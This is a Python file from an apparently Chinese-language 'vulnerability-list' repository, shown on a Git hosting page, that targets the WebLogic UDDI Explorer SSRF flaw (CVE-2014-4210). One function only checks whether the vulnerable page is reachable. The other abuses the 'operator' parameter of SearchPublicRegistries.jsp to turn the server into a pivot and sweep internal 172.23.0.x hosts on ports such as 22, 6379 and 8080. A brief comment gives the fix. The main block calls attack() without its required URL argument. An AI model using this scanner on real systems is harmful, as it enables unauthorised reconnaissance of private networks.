1120362990/vulnerability-list
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1a6324ea1359cda1978fb5a8d4aa9bae9e52da9a
vulnerability-list/weblogic/ssrf.py
Rpkr 6f7f94ac37 update+nmap结果整理功能
2019-01-15 18:44:35 +08:00

58 lines
1.9 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# -*- coding: utf-8 -*-
import requests
'''
Usage:
moon.py -u weblogic http://127.0.0.1:7001
weblogic version: 10.0.2,10.3.6
修复uddiexplorer 删除该目录下的文件,或者做权限配置,禁止对外访问。
如果可登陆,可在 Setup UDDI Explorer 处获得明确的内网IP
'''
def attack(URL):
print('[+]开始检测-Weblogic-ssrf-CVE-2014-4210。[+]')
url = f'{URL}/uddiexplorer/'
headers = {"Content-Type":'text/xml',
"User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'}
try:
r = requests.get(url, headers=headers)
if r.status_code == 200:
print("存在weblogic-ssrf漏洞页面"+url)
else:
print("[-]未发现漏洞页面。")
except requests.exceptions.ConnectionError:
print('[-]访问页面出错!')
print('[+]检测结束-Weblogic-ssrf-CVE-2014-4210。[+]')
print('\n')
def check():
url = "http://192.168.85.133:7001/uddiexplorer/SearchPublicRegistries.jsp"
ports = [6378, 6379, 22, 25, 80, 8080, 8888, 8000, 7001, 7002]
for i in range(1, 255):
for port in ports:
params = dict(
rdoSearch="name",
txtSearchname="sdf",
selfor="Business+location",
btnSubmit="Search",
operator="http://172.23.0.{}:{}".format(i, port))
try:
r = requests.get(url, params=params, timeout=3)
except:
pass
if 'could not connect over HTTP to server' not in r.text and 'No route to host' not in r.text:
print('[*] http://172.23.0.{}:{}'.format(i, port))
else:
pass # print('[-] http://172.23.0.{}:{}'.format(i,port))
if __name__ == "__main__":
attack()
Reference in New Issue View Git Blame Copy Permalink